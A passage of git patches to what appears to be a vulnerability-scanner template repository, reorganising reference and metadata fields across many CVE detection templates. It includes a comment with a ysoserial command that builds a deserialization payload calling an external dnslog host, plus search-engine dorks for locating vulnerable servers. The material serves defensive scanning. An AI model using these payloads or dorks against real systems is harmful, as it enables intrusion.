- https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 + - https://www.hpe.com/us/en/home.html # vendor homepage # This template exploits a vulnerability in LinuxKI Toolset <= 6.01 which allows remote code execution. # The kivis.php pid parameter received from the user is sent to the shell_exec function, resulting in security vulnerability. - # https://github.com/HewlettPackard/LinuxKI/commit/10bef483d92a85a13a59ca65a288818e92f80d78 - # vendor: https://www.hpe.com/us/en/home.html - # software: https://github.com/HewlettPackard/LinuxKI - requests: - method: GET path: diff --git a/cves/2020/CVE-2020-9496.yaml b/cves/2020/CVE-2020-9496.yaml index bf637b1ef7..d8143b9e67 100644 --- a/cves/2020/CVE-2020-9496.yaml +++ b/cves/2020/CVE-2020-9496.yaml @@ -9,14 +9,7 @@ info: reference: - http://packetstormsecurity.com/files/158887/Apache-OFBiz-XML-RPC-Java-Deserialization.html - http://packetstormsecurity.com/files/161769/Apache-OFBiz-XML-RPC-Java-Deserialization.html - - - # This template detects a Java deserialization vulnerability in Apache - # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for - # versions prior to 17.12.04. - # -- - # References: - # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz + - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz requests: - raw: diff --git a/cves/2021/CVE-2021-22122.yaml b/cves/2021/CVE-2021-22122.yaml index 2738c6092d..53c6058203 100644 --- a/cves/2021/CVE-2021-22122.yaml +++ b/cves/2021/CVE-2021-22122.yaml @@ -12,14 +12,6 @@ info: - https://twitter.com/ptswarm/status/1357316793753362433 tags: cve,cve2021,fortiweb,xss - # FortiWeb GUI interface may allow an unauthenticated, remote attacker - # to perform a reflected cross site scripting attack (XSS) by injecting - # malicious payload in different vulnerable API end-points. - # - - # References: - # - https://www.fortiguard.com/psirt/FG-IR-20-122 - # - https://twitter.com/ptswarm/status/1357316793753362433 - requests: - method: GET path: diff --git a/cves/2021/CVE-2021-26295.yaml b/cves/2021/CVE-2021-26295.yaml index 1d812c55c6..95539c89b6 100644 --- a/cves/2021/CVE-2021-26295.yaml +++ b/cves/2021/CVE-2021-26295.yaml @@ -13,7 +13,6 @@ info: # Note:- This is detection template, To perform deserializes do as below # java.exe -jar .\ysoserial-master-d367e379d9-1.jar URLDNS http://t53lq9.dnslog.cn/ > mad.ot # `cat mad.ot | hex` and replace in along with the url in std-String value - # Exploit: https://github.com/yumusb/CVE-2021-26295-POC requests: - raw: diff --git a/default-logins/grafana/grafana-default-credential.yaml b/default-logins/grafana/grafana-default-credential.yaml index 202a386634..7f783dfd10 100644 --- a/default-logins/grafana/grafana-default-credential.yaml +++ b/default-logins/grafana/grafana-default-credential.yaml @@ -4,9 +4,11 @@ info: author: pdteam severity: high tags: grafana,default-login + reference: + - https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection + - https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page + - https://github.com/grafana/grafana/issues/14755 - # https://grafana.com/docs/grafana/latest/administration/configuration/#disable_brute_force_login_protection - # https://github.com/grafana/grafana/issues/14755 # Grafana blocks for 5 minutes after 5 "Invalid" attempts for valid user. # So make sure, not to attempt more than 4 password for same valid user. @@ -22,7 +24,7 @@ requests: - admin # Added default grafana and prometheus user. - # Source:- https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page + # Source: https://stackoverflow.com/questions/54039604/what-is-the-default-username-and-password-for-grafana-login-page attack: sniper diff --git a/default-logins/solarwinds/solarwinds-default-admin.yaml b/default-logins/solarwinds/solarwinds-default-admin.yaml index fe65c24091..55d834c7b5 100644 --- a/default-logins/solarwinds/solarwinds-default-admin.yaml +++ b/default-logins/solarwinds/solarwinds-default-admin.yaml @@ -11,9 +11,6 @@ info: # POST /SolarWinds/InformationService/v3/Json/Create/Orion.Pollers HTTP/1.1 # {"PollerType":"Hello, world! from nuclei :-P", "NetObject":"N:1337", "NetObjectType":"N", "NetObjectID":1337} - # References: - # - https://github.com/solarwinds/OrionSDK/wiki/REST - requests: - method: GET path: diff --git a/dns/azure-takeover-detection.yaml b/dns/azure-takeover-detection.yaml index 616db8eb2e..90151fd83a 100644 --- a/dns/azure-takeover-detection.yaml +++ b/dns/azure-takeover-detection.yaml @@ -5,13 +5,13 @@ info: author: pdteam severity: high tags: dns,takeover + reference: + - https://godiego.tech/posts/STO/ # kudos to @secfaults for sharing process details. - # Update the list with more CNAMEs related to azure + # Update the list with more CNAMEs related to Azure # You need to claim the CNAME in Azure portal (https://portal.azure.com) to confirm the takeover. - # Reference:- https://godiego.tech/posts/STO/, kudos to @secfaults for sharing process details. # Do not report this without claiming the CNAME. - dns: - name: "{{FQDN}}" type: A diff --git a/exposures/configs/alibaba-canal-info-leak.yaml b/exposures/configs/alibaba-canal-info-leak.yaml index 69fa26a672..424d0f6848 100644 --- a/exposures/configs/alibaba-canal-info-leak.yaml +++ b/exposures/configs/alibaba-canal-info-leak.yaml @@ -5,10 +5,10 @@ info: author: pikpikcu severity: info tags: config,exposure - - # https://github.com/alibaba/canal/issues/632 - # https://netty.io/wiki/reference-counted-objects.html - # https://my.oschina.net/u/4581879/blog/4753320 + reference: + - https://github.com/alibaba/canal/issues/632 + - https://netty.io/wiki/reference-counted-objects.html + - https://my.oschina.net/u/4581879/blog/4753320 requests: - method: GET diff --git a/technologies/clockwork-php-page.yaml b/technologies/clockwork-php-page.yaml index eab19b1f08..39d1765923 100644 --- a/technologies/clockwork-php-page.yaml +++ b/technologies/clockwork-php-page.yaml @@ -3,7 +3,8 @@ info: name: Clockwork PHP page exposure author: organiccrap severity: high - # https://twitter.com/damian_89_/status/1250721398747791360 + reference: https://twitter.com/damian_89_/status/1250721398747791360 + requests: - method: GET path: diff --git a/technologies/firebase-detect.yaml b/technologies/firebase-detect.yaml index fcf13d1285..fe3ff98b30 100644 --- a/technologies/firebase-detect.yaml +++ b/technologies/firebase-detect.yaml @@ -4,7 +4,7 @@ info: name: firebase detect author: organiccrap severity: low - # http://ghostlulz.com/google-exposed-firebase-database/ + reference: http://ghostlulz.com/google-exposed-firebase-database/ requests: - method: GET diff --git a/technologies/liferay-portal-detect.yaml b/technologies/liferay-portal-detect.yaml index 58d0894274..2620f82dc9 100644 --- a/technologies/liferay-portal-detect.yaml +++ b/technologies/liferay-portal-detect.yaml @@ -3,8 +3,8 @@ info: name: Liferay Portal Detection author: organiccrap,dwisiswant0 severity: info - # CVE-2020-7961: Liferay Portal Unauthenticated RCE - # https://github.com/mzer0one/CVE-2020-7961-POC + reference: https://github.com/mzer0one/CVE-2020-7961-POC # CVE-2020-7961: Liferay Portal Unauthenticated RCE + requests: - method: GET path: diff --git a/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml b/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml index 1590a904fe..c07f287060 100644 --- a/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml +++ b/vulnerabilities/jira/jira-unauthenticated-dashboards.yaml @@ -1,7 +1,7 @@ id: jira-unauthenticated-dashboards # If public sharing is ON it allows users to share dashboards and filters with all users including -# those that are not logged in. Those dashboard and filters could reveal potentially sensitive information. +# those that are not logged in. Those dashboards and filters could reveal potentially sensitive information. info: name: Jira Unauthenticated Dashboards diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml index daf3feea8e..5d4a64ee03 100644 --- a/vulnerabilities/other/rconfig-rce.yaml +++ b/vulnerabilities/other/rconfig-rce.yaml @@ -7,10 +7,10 @@ info: tags: rconfig,rce # This template supports the user creation part only. - # To triggering an RCE, see references[2]. - # References: - # - [1] https://www.rconfig.com/downloads/rconfig-3.9.5.zip - # - [2] https://www.exploit-db.com/exploits/48878 + # To triggering an RCE, see reference[2]. + reference: + - https://www.rconfig.com/downloads/rconfig-3.9.5.zip + - https://www.exploit-db.com/exploits/48878 requests: - raw: diff --git a/vulnerabilities/other/sick-beard-xss.yaml b/vulnerabilities/other/sick-beard-xss.yaml index 99281db45d..a384753cdb 100644 --- a/vulnerabilities/other/sick-beard-xss.yaml +++ b/vulnerabilities/other/sick-beard-xss.yaml @@ -5,10 +5,11 @@ info: author: pikpikcu severity: medium tags: xss - -# Vendor Homepage: https://sickbeard.com/ -# Software Link: https://github.com/midgetspy/Sick-Beard -# shodan dork: sickbeard + reference: + - https://sickbeard.com/ # vendor homepage + - https://github.com/midgetspy/Sick-Beard # software link + customAttributes: + shodan-dork: sickbeard requests: - method: GET diff --git a/vulnerabilities/springboot/springboot-h2-db-rce.yaml b/vulnerabilities/springboot/springboot-h2-db-rce.yaml index 210c9f5638..4dc41f4bc9 100644 --- a/vulnerabilities/springboot/springboot-h2-db-rce.yaml +++ b/vulnerabilities/springboot/springboot-h2-db-rce.yaml @@ -7,7 +7,6 @@ info: tags: springboot,rce # Payload taken from @pyn3rd (Twitter), see reference[2]. - reference: - https://spaceraccoon.dev/remote-code-execution-in-three-acts-chaining-exposed-actuators-and-h2-database - https://twitter.com/pyn3rd/status/1305151887964946432 diff --git a/vulnerabilities/wordpress/wordpress-emergency-script.yaml b/vulnerabilities/wordpress/wordpress-emergency-script.yaml index 4be5b85aa1..b575cc4a57 100644 --- a/vulnerabilities/wordpress/wordpress-emergency-script.yaml +++ b/vulnerabilities/wordpress/wordpress-emergency-script.yaml @@ -5,8 +5,6 @@ info: author: dwisiswant0 severity: info tags: wordpress - - # Ref:- reference: https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script requests: From ffaff645657deb1ecf4ea499beee267497779185 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 19 Aug 2021 16:17:27 +0300 Subject: [PATCH 1744/4083] Changes fixes/around dynamic attributes ("additional-fields") Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- cves/2009/CVE-2009-1151.yaml | 5 +++-- cves/2015/CVE-2015-5688.yaml | 5 +++-- cves/2018/CVE-2018-1335.yaml | 5 +++-- cves/2019/CVE-2019-1010287.yaml | 9 +++++---- cves/2019/CVE-2019-12461.yaml | 5 +++-- cves/2019/CVE-2019-12593.yaml | 13 +++++++------ cves/2019/CVE-2019-16097.yaml | 5 +++-- cves/2020/CVE-2020-14864.yaml | 3 ++- cves/2020/CVE-2020-15500.yaml | 5 +++-- cves/2021/CVE-2021-22986.yaml | 5 +++-- cves/2021/CVE-2021-26722.yaml | 1 - default-logins/szhe/szhe-default-password.yaml | 3 ++- exposed-panels/unauthenticated-frp.yaml | 3 ++- miscellaneous/unencrypted-bigip-ltm-cookie.yaml | 5 +++-- misconfiguration/unauthenticated-nacos-access.yaml | 2 +- .../unauthenticated-varnish-cache-purge.yaml | 5 +++-- vulnerabilities/generic/top-xss-params.yaml | 3 ++- vulnerabilities/other/bullwark-momentum-lfi.yaml | 14 ++++++++------ vulnerabilities/other/ruijie-networks-rce.yaml | 5 +++-- 19 files changed, 59 insertions(+), 42 deletions(-) diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index c4ea42dfa4..f52b3c3c1a 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -5,8 +5,9 @@ info: author: princechaddha severity: high description: Setup script used to generate configuration can be fooled using a crafted POST request to include arbitrary PHP code in generated configuration file. Combined with ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code. - reference: https://www.phpmyadmin.net/security/PMASA-2009-3/ - vulhub: https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 + reference: + - https://www.phpmyadmin.net/security/PMASA-2009-3/ + - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433 tags: cve,cve2009,phpmyadmin,rce,deserialization requests: diff --git a/cves/2015/CVE-2015-5688.yaml b/cves/2015/CVE-2015-5688.yaml index 7c27e591c1..863d5b557d 100644 --- a/cves/2015/CVE-2015-5688.yaml +++ b/cves/2015/CVE-2015-5688.yaml @@ -4,9 +4,10 @@ info: name: Geddy before v13.0.8 LFI author: pikpikcu severity: high - issues: https://github.com/geddy/geddy/issues/697 description: Directory traversal vulnerability in lib/app/index.js in Geddy before 13.0.8 for Node.js allows remote attackers to read arbitrary files via a ..%2f (dot dot encoded slash) in the PATH_INFO to the default URI. - reference: https://nodesecurity.io/advisories/geddy-directory-traversal + reference: + - https://nodesecurity.io/advisories/geddy-directory-traversal + - https://github.com/geddy/geddy/issues/697 tags: cve,cve2015,geddy,lfi requests: diff --git a/cves/2018/CVE-2018-1335.yaml b/cves/2018/CVE-2018-1335.yaml index 74fea232e7..407d1422cc 100644 --- a/cves/2018/CVE-2018-1335.yaml +++ b/cves/2018/CVE-2018-1335.yaml @@ -4,8 +4,9 @@ info: name: Apache Tika 1.15-1.17 Header Command Injection author: pikpikcu severity: critical - reference: https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ - edb: https://www.exploit-db.com/exploits/47208 + reference: + - https://rhinosecuritylabs.com/application-security/exploiting-cve-2018-1335-apache-tika/ + - https://www.exploit-db.com/exploits/47208 tags: cve,cve2018,apache,tika,rce requests: diff --git a/cves/2019/CVE-2019-1010287.yaml b/cves/2019/CVE-2019-1010287.yaml index 1d94d6372d..c67b2a83d4 100644 --- a/cves/2019/CVE-2019-1010287.yaml +++ b/cves/2019/CVE-2019-1010287.yaml @@ -4,11 +4,12 @@ info: name: Timesheet 1.5.3 - Cross Site Scripting author: pikpikcu severity: high - reference: https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2019-1010287 + - http://www.mdh-tz.info/ # demo tags: cve,cve2019,timesheet,xss - -# Google-Dork: inurl:"/timesheet/login.php" -# Demo: http://www.mdh-tz.info/ + additional-fields: + google-dork: inurl:"/timesheet/login.php" requests: - raw: # Metod POST From login.php diff --git a/cves/2019/CVE-2019-12461.yaml b/cves/2019/CVE-2019-12461.yaml index 156fac2f58..c2dfd74c28 100644 --- a/cves/2019/CVE-2019-12461.yaml +++ b/cves/2019/CVE-2019-12461.yaml @@ -6,8 +6,9 @@ info: severity: medium description: Web Port 1.19.1 allows XSS via the /log type parameter. tags: cve,cve2019,xss - reference: https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS - software: https://webport.se/nedladdningar/ + reference: + - https://github.com/EmreOvunc/WebPort-v1.19.1-Reflected-XSS + - https://webport.se/nedladdningar/ requests: - method: GET diff --git a/cves/2019/CVE-2019-12593.yaml b/cves/2019/CVE-2019-12593.yaml index f926240507..5a28c889a4 100644 --- a/cves/2019/CVE-2019-12593.yaml +++ b/cves/2019/CVE-2019-12593.yaml @@ -6,12 +6,13 @@ info: severity: high description: IceWarp Mail Server through 10.4.4 is prone to a local file inclusion vulnerability via webmail/calendar/minimizer/index.php?style=..%5c directory traversal. tags: cve,cve2019,lfi - reference: https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt - - # reference: https://nvd.nist.gov/vuln/detail/CVE-2019-12593 - # Google Dork:-Powered By IceWarp 10.4.4 - # Vendor Homepage: http://www.icewarp.com - # Software Link: https://www.icewarp.com/downloads/trial/ + reference: + - https://github.com/JameelNabbo/exploits/blob/master/IceWarp%20%3C%3D10.4.4%20local%20file%20include.txt + - https://nvd.nist.gov/vuln/detail/CVE-2019-12593 + - http://www.icewarp.com # vendor homepage + - https://www.icewarp.com/downloads/trial/ # software link + additional-fields: + google-dork: Powered By IceWarp 10.4.4 requests: - method: GET diff --git a/cves/2019/CVE-2019-16097.yaml b/cves/2019/CVE-2019-16097.yaml index 813c880b10..d1b82e8f42 100644 --- a/cves/2019/CVE-2019-16097.yaml +++ b/cves/2019/CVE-2019-16097.yaml @@ -5,8 +5,9 @@ info: severity: critical description: | core/api/user.go in Harbor 1.7.0 through 1.8.2 allows non-admin users to create admin accounts via the POST /api/users API, when Harbor is setup with DB as authentication backend and allow user to do self-registration. Fixed version: v1.7.6 v1.8.3. v.1.9.0. Workaround without applying the fix: configure Harbor to use non-DB authentication backend such as LDAP. - issues: https://github.com/goharbor/harbor/issues/8951 - reference: https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ + reference: + - https://unit42.paloaltonetworks.com/critical-vulnerability-in-harbor-enables-privilege-escalation-from-zero-to-admin-cve-2019-16097/ + - https://github.com/goharbor/harbor/issues/8951 tags: cve,cve2019,intrusive,harbor requests: diff --git a/cves/2020/CVE-2020-14864.yaml b/cves/2020/CVE-2020-14864.yaml index 9a0064925f..65f3b7b0f5 100644 --- a/cves/2020/CVE-2020-14864.yaml +++ b/cves/2020/CVE-2020-14864.yaml @@ -3,12 +3,13 @@ info: name: Oracle Fusion - "getPreviewImage" Directory Traversal/Local File Inclusion description: 'Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - "getPreviewImage" Directory Traversal/Local File Inclusion' author: Ivo Palazzolo (@palaziv) - cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N' severity: high tags: cve,cve2020,oracle,lfi reference: - http://packetstormsecurity.com/files/159748/Oracle-Business-Intelligence-Enterprise-Edition-5.5.0.0.0-12.2.1.3.0-12.2.1.4.0-LFI.html - https://www.oracle.com/security-alerts/cpuoct2020.html + additional-fields: + cvss: 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N' requests: - method: GET diff --git a/cves/2020/CVE-2020-15500.yaml b/cves/2020/CVE-2020-15500.yaml index 21b2119cba..910bd856be 100644 --- a/cves/2020/CVE-2020-15500.yaml +++ b/cves/2020/CVE-2020-15500.yaml @@ -4,8 +4,9 @@ info: name: TileServer GL Reflected XSS author: Akash.C severity: medium - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-15500 - source: https://github.com/maptiler/tileserver-gl/issues/461 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2020-15500 + - https://github.com/maptiler/tileserver-gl/issues/461 tags: cve,cve2020,xss,tileserver requests: diff --git a/cves/2021/CVE-2021-22986.yaml b/cves/2021/CVE-2021-22986.yaml index bf2d922d36..508e2fda49 100644 --- a/cves/2021/CVE-2021-22986.yaml +++ b/cves/2021/CVE-2021-22986.yaml @@ -5,8 +5,9 @@ info: severity: critical tags: bigip,cve,cve2021,rce description: The iControl REST interface has an unauthenticated remote command execution vulnerability. - reference: https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 - advisory: https://support.f5.com/csp/article/K03009991 + reference: + - https://attackerkb.com/topics/J6pWeg5saG/k03009991-icontrol-rest-unauthenticated-remote-command-execution-vulnerability-cve-2021-22986 + - https://support.f5.com/csp/article/K03009991 requests: - raw: diff --git a/cves/2021/CVE-2021-26722.yaml b/cves/2021/CVE-2021-26722.yaml index e5546fa281..3b867adacd 100644 --- a/cves/2021/CVE-2021-26722.yaml +++ b/cves/2021/CVE-2021-26722.yaml @@ -7,7 +7,6 @@ info: description: LinkedIn Oncall through 1.4.0 allows reflected XSS via /query because of mishandling of the "No results found for" message in the search bar. reference: https://github.com/linkedin/oncall/issues/341 tags: cve,cve2021,linkedin,xss - issues: https://github.com/linkedin/oncall/issues/341 requests: - method: GET diff --git a/default-logins/szhe/szhe-default-password.yaml b/default-logins/szhe/szhe-default-password.yaml index 95d6c454af..a9bad340b2 100644 --- a/default-logins/szhe/szhe-default-password.yaml +++ b/default-logins/szhe/szhe-default-password.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: low tags: szhe,default-login - vendor: https://github.com/Cl0udG0d/SZhe_Scan + reference: + - https://github.com/Cl0udG0d/SZhe_Scan # vendor homepage requests: - method: POST diff --git a/exposed-panels/unauthenticated-frp.yaml b/exposed-panels/unauthenticated-frp.yaml index 893f35e69b..804da1cc21 100644 --- a/exposed-panels/unauthenticated-frp.yaml +++ b/exposed-panels/unauthenticated-frp.yaml @@ -5,7 +5,8 @@ info: author: pikpikcu severity: info tags: frp,unauth,panel - vendor: https://github.com/fatedier/frp/ + reference: + - https://github.com/fatedier/frp/ # vendor homepage requests: - method: GET diff --git a/miscellaneous/unencrypted-bigip-ltm-cookie.yaml b/miscellaneous/unencrypted-bigip-ltm-cookie.yaml index 4e1a655549..91aa49ff3a 100644 --- a/miscellaneous/unencrypted-bigip-ltm-cookie.yaml +++ b/miscellaneous/unencrypted-bigip-ltm-cookie.yaml @@ -4,8 +4,9 @@ info: name: F5 BIGIP Unencrypted Cookie author: PR3R00T severity: info - reference: https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values - mitigation: https://support.f5.com/csp/article/K23254150 + reference: + - https://www.intelisecure.com/how-to-decode-big-ip-f5-persistence-cookie-values + - https://support.f5.com/csp/article/K23254150 tags: misc requests: diff --git a/misconfiguration/unauthenticated-nacos-access.yaml b/misconfiguration/unauthenticated-nacos-access.yaml index 02ab564941..a5c75638f1 100644 --- a/misconfiguration/unauthenticated-nacos-access.yaml +++ b/misconfiguration/unauthenticated-nacos-access.yaml @@ -4,7 +4,7 @@ info: name: Unauthenticated Nacos access v1.x author: taielab,pikpikcu severity: critical - issues: https://github.com/alibaba/nacos/issues/4593 + reference: https://github.com/alibaba/nacos/issues/4593 tags: nacos,unauth requests: diff --git a/misconfiguration/unauthenticated-varnish-cache-purge.yaml b/misconfiguration/unauthenticated-varnish-cache-purge.yaml index 459ab72757..8ac2831906 100644 --- a/misconfiguration/unauthenticated-varnish-cache-purge.yaml +++ b/misconfiguration/unauthenticated-varnish-cache-purge.yaml @@ -4,8 +4,9 @@ info: author: 0xelkomy severity: low description: As per guideline one should protect purges with ACLs from unauthorized hosts. - reference: https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html - hackerone: https://hackerone.com/reports/154278 + reference: + - https://book.varnish-software.com/4.0/chapters/Cache_Invalidation.html + - https://hackerone.com/reports/154278 tags: varnish,misconfig,cache requests: diff --git a/vulnerabilities/generic/top-xss-params.yaml b/vulnerabilities/generic/top-xss-params.yaml index 677a594c29..49ca980a02 100644 --- a/vulnerabilities/generic/top-xss-params.yaml +++ b/vulnerabilities/generic/top-xss-params.yaml @@ -6,7 +6,8 @@ info: severity: medium description: Searches for reflected XSS in the server response via GET-requests. tags: xss - parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p + additional-fields: + parameters: q,s,search,id,action,keyword,query,page,keywords,url,view,cat,name,key,p requests: - method: GET diff --git a/vulnerabilities/other/bullwark-momentum-lfi.yaml b/vulnerabilities/other/bullwark-momentum-lfi.yaml index adf52d8ae7..d2e593583a 100644 --- a/vulnerabilities/other/bullwark-momentum-lfi.yaml +++ b/vulnerabilities/other/bullwark-momentum-lfi.yaml @@ -5,13 +5,15 @@ info: author: pikpikcu severity: high tags: bullwark,lfi - reference: https://www.exploit-db.com/exploits/47773 + reference: + - https://www.exploit-db.com/exploits/47773 + - http://www.bullwark.net/ # vendor homepage + - http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 # software link -# Vendor Homepage: http://www.bullwark.net/ -# Version : Bullwark Momentum Series Web Server JAWS/1.0 -# Software Link : http://www.bullwark.net/Kategoriler.aspx?KategoriID=24 -# Shodan Dork: https://www.shodan.io/search?query=Bullwark&page=1 -# fofa dork:-https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D + additional-fields: + version: Bullwark Momentum Series Web Server JAWS/1.0 + shodan-dork: https://www.shodan.io/search?query=Bullwark&page=1 + fofa-dork: https://fofa.so/result?q=Bullwark&qbase64=QnVsbHdhcms%3D requests: - raw: diff --git a/vulnerabilities/other/ruijie-networks-rce.yaml b/vulnerabilities/other/ruijie-networks-rce.yaml index 492b2c3fe9..8f52c10b10 100644 --- a/vulnerabilities/other/ruijie-networks-rce.yaml +++ b/vulnerabilities/other/ruijie-networks-rce.yaml @@ -4,8 +4,9 @@ info: name: Ruijie Networks-EWEB Network Management System RCE author: pikpikcu severity: critical - reference: https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py - vendor: https://www.ruijienetworks.com + reference: + - https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py + - https://www.ruijienetworks.com # vendor homepage tags: ruijie,rce requests: From f55d6b75e17f8938533e138e27e367e176feb3e6 Mon Sep 17 00:00:00 2001 From: forgedhallpass <13679401+forgedhallpass@users.noreply.github.com> Date: Thu, 19 Aug 2021 16:59:12 +0300 Subject: [PATCH 1745/4083] Removed pipe (|) character from references, because the structure requires it to be a string slice, not a string Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 --- cves/2008/CVE-2008-4668.yaml | 2 +- cves/2008/CVE-2008-4764.yaml | 2 +- cves/2008/CVE-2008-6172.yaml | 2 +- cves/2009/CVE-2009-5114.yaml | 2 +- cves/2010/CVE-2010-0943.yaml | 2 +- cves/2010/CVE-2010-0944.yaml | 2 +- cves/2010/CVE-2010-1353.yaml | 2 +- cves/2010/CVE-2010-1474.yaml | 2 +- cves/2010/CVE-2010-1495.yaml | 2 +- cves/2010/CVE-2010-1602.yaml | 2 +- cves/2010/CVE-2010-1657.yaml | 2 +- cves/2010/CVE-2010-1722.yaml | 2 +- cves/2010/CVE-2010-1875.yaml | 2 +- cves/2010/CVE-2010-1953.yaml | 2 +- cves/2010/CVE-2010-1955.yaml | 2 +- cves/2010/CVE-2010-1979.yaml | 2 +- cves/2010/CVE-2010-1983.yaml | 2 +- cves/2010/CVE-2010-2033.yaml | 2 +- cves/2010/CVE-2010-2259.yaml | 2 +- cves/2010/CVE-2010-2682.yaml | 2 +- cves/2010/CVE-2010-4617.yaml | 2 +- cves/2010/CVE-2010-5278.yaml | 2 +- cves/2011/CVE-2011-4336.yaml | 2 +- cves/2011/CVE-2011-4804.yaml | 2 +- cves/2012/CVE-2012-0991.yaml | 2 +- cves/2012/CVE-2012-4253.yaml | 2 +- cves/2013/CVE-2013-5979.yaml | 2 +- cves/2014/CVE-2014-4535.yaml | 2 +- cves/2014/CVE-2014-4536.yaml | 2 +- cves/2014/CVE-2014-5368.yaml | 2 +- cves/2014/CVE-2014-8799.yaml | 2 +- cves/2015/CVE-2015-2807.yaml | 2 +- cves/2015/CVE-2015-9414.yaml | 2 +- cves/2016/CVE-2016-1000128.yaml | 2 +- cves/2016/CVE-2016-1000139.yaml | 2 +- cves/2016/CVE-2016-1000148.yaml | 2 +- cves/2016/CVE-2016-10993.yaml | 2 +- cves/2016/CVE-2016-2389.yaml | 2 +- cves/2017/CVE-2017-18024.yaml | 2 +- cves/2018/CVE-2018-10818.yaml | 2 +- cves/2018/CVE-2018-16167.yaml | 2 +- cves/2018/CVE-2018-16288.yaml | 2 +- cves/2018/CVE-2018-19458.yaml | 2 +- cves/2018/CVE-2018-20470.yaml | 2 +- cves/2019/CVE-2019-12276.yaml | 2 +- cves/2019/CVE-2019-16313.yaml | 2 +- cves/2019/CVE-2019-16332.yaml | 2 +- cves/2019/CVE-2019-7238.yaml | 2 +- cves/2020/CVE-2019-9618.yaml | 2 +- cves/2020/CVE-2020-25223.yaml | 2 +- cves/2020/CVE-2020-35598.yaml | 2 +- cves/2020/CVE-2020-6637.yaml | 2 +- cves/2021/CVE-2021-20090.yaml | 2 +- cves/2021/CVE-2021-20091.yaml | 2 +- cves/2021/CVE-2021-20092.yaml | 2 +- cves/2021/CVE-2021-24320.yaml | 2 +- cves/2021/CVE-2021-29484.yaml | 2 +- cves/2021/CVE-2021-3017.yaml | 2 +- cves/2021/CVE-2021-32305.yaml | 2 +- cves/2021/CVE-2021-33807.yaml | 2 +- cves/2021/CVE-2021-34473.yaml | 2 +- cves/2021/CVE-2021-35336.yaml | 2 +- cves/2021/CVE-2021-36380.yaml | 2 +- cves/2021/CVE-2021-37704.yaml | 2 +- exposures/configs/qdpm-info-leak.yaml | 2 +- misconfiguration/akamai-arl-xss.yaml | 2 +- misconfiguration/zabbix-dashboards-access.yaml | 2 +- takeovers/announcekit-takeover.yaml | 2 +- vulnerabilities/other/beward-ipcamera-disclosure.yaml | 2 +- vulnerabilities/other/buffalo-config-injection.yaml | 2 +- vulnerabilities/other/ms-exchange-server-reflected-xss.yaml | 2 +- vulnerabilities/other/opensis-lfi.yaml | 2 +- vulnerabilities/other/sar2html-rce.yaml | 2 +- .../wordpress/wp-woocommerce-pdf-invoice-listing.yaml | 2 +- 74 files changed, 74 insertions(+), 74 deletions(-) diff --git a/cves/2008/CVE-2008-4668.yaml b/cves/2008/CVE-2008-4668.yaml index 86cdf1bca8..ab38886489 100644 --- a/cves/2008/CVE-2008-4668.yaml +++ b/cves/2008/CVE-2008-4668.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the Image Browser (com_imagebrowser) 0.1.5 component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php. - reference: | + reference: - https://www.exploit-db.com/exploits/6618 - https://www.cvedetails.com/cve/CVE-2008-4668 tags: cve,cve2008,joomla,lfi diff --git a/cves/2008/CVE-2008-4764.yaml b/cves/2008/CVE-2008-4764.yaml index 4435b80ee5..309174ce27 100644 --- a/cves/2008/CVE-2008-4764.yaml +++ b/cves/2008/CVE-2008-4764.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action. - reference: | + reference: - https://www.exploit-db.com/exploits/5435 - 